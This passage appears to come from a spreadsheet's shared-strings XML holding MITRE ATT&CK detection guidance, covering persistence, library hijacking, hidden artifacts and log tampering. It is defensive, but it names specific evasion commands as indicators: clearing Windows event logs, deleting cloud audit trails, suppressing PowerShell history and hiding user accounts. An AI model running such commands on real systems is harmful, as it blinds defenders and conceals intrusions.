  <si>
    <t xml:space="preserve">While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.
Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) 
For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file.
</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.(Citation: TechNet Autoruns)(Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI &lt;code&gt;EventFilter&lt;/code&gt;, &lt;code&gt;EventConsumer&lt;/code&gt;, and &lt;code&gt;FilterToConsumerBinding&lt;/code&gt; events. Event ID 5861 is logged on Windows 10 systems when new &lt;code&gt;EventFilterToConsumerBinding&lt;/code&gt; events are created.(Citation: Elastic - Hunting for Persistence Part 1)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).(Citation: Microsoft Register-WmiEvent)</t>
  </si>
  <si>
    <t>Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) </t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) 
Artifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. </t>
  </si>
  <si>
    <t xml:space="preserve">Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) </t>
  </si>
  <si>
    <t>Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t>Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)
Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of [Discovery](https://attack.mitre.org/tactics/TA0007), or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.
When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.</t>
  </si>
  <si>
    <t xml:space="preserve">System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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 Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather file and directory information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.  </t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include &lt;code&gt;chmod +x&lt;/code&gt;, &lt;code&gt;chmod -R 755&lt;/code&gt;, and &lt;code&gt;chmod 777&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques) 
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)
Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
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Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
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Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
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Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
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Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
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Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
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System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor for suspicious use of &lt;code&gt;gpresult&lt;/code&gt;. Monitor for the use of PowerShell functions such as &lt;code&gt;Get-DomainGPO&lt;/code&gt; and &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt; and processes spawning with command-line arguments containing &lt;code&gt;GPOLocalGroup&lt;/code&gt;.
Monitor for abnormal LDAP queries with filters for &lt;code&gt;groupPolicyContainer&lt;/code&gt; and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</t>
  </si>
  <si>
    <t>Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.
On Windows systems, monitor for creation of suspicious inbox rules through the use of the &lt;code&gt;New-InboxRule&lt;/code&gt; and &lt;code&gt;Set-InboxRule&lt;/code&gt; PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the &lt;code&gt;RulesActiveState.plist&lt;/code&gt;, &lt;code&gt;SyncedRules.plist&lt;/code&gt;, &lt;code&gt;UnsyncedRules.plist&lt;/code&gt;, and &lt;code&gt;MessageRules.plist&lt;/code&gt; files.(Citation: MacOS Email Rules)</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs. 
Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; key.
In macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the &lt;code&gt;Hide500Users&lt;/code&gt; key value to &lt;code&gt;TRUE&lt;/code&gt; in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file. Monitor the command line for usage of the &lt;code&gt;dscl . create&lt;/code&gt; command with the &lt;code&gt;IsHidden&lt;/code&gt; attribute set to &lt;code&gt;1&lt;/code&gt;.(Citation: Apple Support Hide a User Account) </t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)
Analyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.</t>
  </si>
  <si>
    <t xml:space="preserve">Identify files with the &lt;code&gt;com.apple.ResourceFork&lt;/code&gt; extended attribute and large data amounts stored in resource forks. 
Monitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. </t>
  </si>
  <si>
    <t>Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.
Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. &lt;code&gt;-silent&lt;/code&gt;, &lt;code&gt;-ignore-reboot&lt;/code&gt;), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. &lt;code&gt;VBoxManage startvm $VM --type headless&lt;/code&gt;).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. &lt;code&gt;VBoxManage.exe setextradata global GUI/SuppressMessages "all"&lt;/code&gt;).
Monitor for commands which enable hypervisors such as Hyper-V.  If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. 
Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. 
Run path dependent libraries can include &lt;code&gt;LC_LOAD_DYLIB&lt;/code&gt;, &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt;, and &lt;code&gt;LC_RPATH&lt;/code&gt;. Other special keywords are recognized by the macOS loader are &lt;code&gt;@rpath&lt;/code&gt;, &lt;code&gt;@loader_path&lt;/code&gt;, and &lt;code&gt;@executable_path&lt;/code&gt;.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the &lt;code&gt;otool -l&lt;/code&gt; command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; and &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious behaviors that could relate to post-compromise behavior.
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances. for known bad sequence of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;WriteProcessMemory()&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; with the parameter set to &lt;code&gt;ProcessBasicInformation&lt;/code&gt; may be used for this technique.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
</t>
  </si>
  <si>
    <t xml:space="preserve">Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. </t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
Monitor environment variables and APIs that can be leveraged to disable security measures.</t>
  </si>
  <si>
    <t>Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs)  In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)  
In Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.
Monitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.
Lack of expected log events may be suspicious.</t>
  </si>
  <si>
    <t>Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: &lt;code&gt;powershell –v 2&lt;/code&gt;). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.
Monitor for Windows event ID (EID) 400, specifically the &lt;code&gt;EngineVersion&lt;/code&gt; field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)</t>
  </si>
  <si>
    <t>Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to clear or disable historical log data with built-in features native to the network device platform.  Monitor such command activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
